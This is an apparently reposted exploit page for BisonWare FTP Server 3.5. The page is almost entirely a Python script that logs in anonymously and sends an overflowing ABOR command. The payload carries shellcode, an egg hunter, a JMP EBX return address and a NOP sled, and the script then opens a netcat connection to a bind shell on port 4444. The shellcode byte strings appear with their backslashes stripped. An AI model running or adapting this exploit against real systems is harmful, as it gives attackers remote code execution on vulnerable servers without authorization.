Home / exploits BisonWare FTP Server 3.5 Buffer Overflow
Posted on 14 May 2015
#!/usr/bin/python # Exploit Title: BisonWare FTP Server Version 3.5 Egg Hunting Exploits # Date: 22 April,2015 # Exploit Author: Bikash Dash # www.vulnerableghost.com # Version: BisonWare FTP Server Version 3.5 # Tested on: Windows XP service pack3 # CVE : [N/A] import socket, sys, os, time print " ================================ " print " -----Vulnerable Gh0st------------ " print " Bikash Dash(0xfb**) " print " Bikash Dash, Chanchal Rastogi,manish Tanwar,Aditya Upadhaya " print " www.vulnerableghost.com " print "================================= " if len(sys.argv) != 3: print "[*] Usage: %s <target> <port> " % sys.argv[0] sys.exit(0) target = sys.argv[1] #User Passed Argument 1 port = int(sys.argv[2]) #User Passed Argument 2 shellcode = ("w00tw00t" + "xbdxa9x85x2dx7fxdaxd0xd9x74x24xf4x58x29xc9xb1" "x56x31x68x13x83xc0x04x03x68xa6x67xd8x83x50xee" "x23x7cxa0x91xaax99x91x83xc9xeax83x13x99xbfx2f" "xdfxcfx2bxa4xadxc7x5cx0dx1bx3ex52x8exadxfex38" "x4cxafx82x42x80x0fxbax8cxd5x4exfbxf1x15x02x54" "x7dx87xb3xd1xc3x1bxb5x35x48x23xcdx30x8fxd7x67" "x3axc0x47xf3x74xf8xecx5bxa5xf9x21xb8x99xb0x4e" "x0bx69x43x86x45x92x75xe6x0axadxb9xebx53xe9x7e" "x13x26x01x7dxaex31xd2xffx74xb7xc7x58xffx6fx2c" "x58x2cxe9xa7x56x99x7dxefx7ax1cx51x9bx87x95x54" "x4cx0exedx72x48x4axb6x1bxc9x36x19x23x09x9exc6" "x81x41x0dx13xb3x0bx5axd0x8exb3x9ax7ex98xc0xa8" "x21x32x4fx81xaax9cx88xe6x81x59x06x19x29x9ax0e" "xdex7dxcax38xf7xfdx81xb8xf8x28x05xe9x56x82xe6" "x59x17x72x8fxb3x98xadxafxbbx72xd8xf7x75xa6x89" "x9fx77x58x3cx3cxf1xbex54xacx57x68xc0x0ex8cxa1" "x77x70xe6x9dx20xe6xbexcbxf6x09x3fxdex55xa5x97" "x89x2dxa5x23xabx32xe0x03xa2x0bx63xd9xdaxdex15" "xdexf6x88xb6x4dx9dx48xb0x6dx0ax1fx95x40x43xf5" "x0bxfaxfdxebxd1x9axc6xafx0dx5fxc8x2exc3xdbxee" "x20x1dxe3xaax14xf1xb2x64xc2xb7x6cxc7xbcx61xc2" "x81x28xf7x28x12x2exf8x64xe4xcex49xd1xb1xf1x66" "xb5x35x8ax9ax25xb9x41x1fx55xf0xcbx36xfex5dx9e" "x0ax63x5ex75x48x9axddx7fx31x59xfdx0ax34x25xb9" "xe7x44x36x2cx07xfax37x65") #Payload prefixed with w00tw00t tag egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7") #32 bytes egg hunter NtDisplayString buffer = "x90"*(1063 - (len(shellcode)+len(egghunter))) #Align the stack ebx = "x71x87xA1x7C" #JMP EBX 7CA18771from Shell32.dll nopsled = "x90"*205 #205 NOP Sled s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connecting to %s on port %d" % (target,port) try: s.connect((target,port)) #Connect to BisonWare FTP Server s.recv(1024) #Receive 1024 bytes from BisonWare FTP Server time.sleep(3) #Wait for 3 seconds before executing next statement print "[+] Sending payload" s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server s.send('USER anonymous ') #Send FTP command 'USER anonymous' s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server s.send('PASS anonymous ') #Send FTP command 'PASS anonymous' s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server s.send('ABOR ' + shellcode + buffer + egghunter + ebx + nopsled +' ') #Send FTP command 'ABOR ' s.close() #Close the socket print "[+] Exploit Sent Successfully" print "[+] Waiting for 5 sec before spawning shell to " + target + ":4444 " print " " time.sleep(5) #Wait for 5 seconds before connection to Bind Shell os.system("nc -n " + target + " 4444") #Connect to Bind Shell using netcat print "[-] Connection lost from " + target + ":4444 " except: print "[-] Could not connect to " + target + ":21 " sys.exit(0) #Exit the Exploit POC code execution
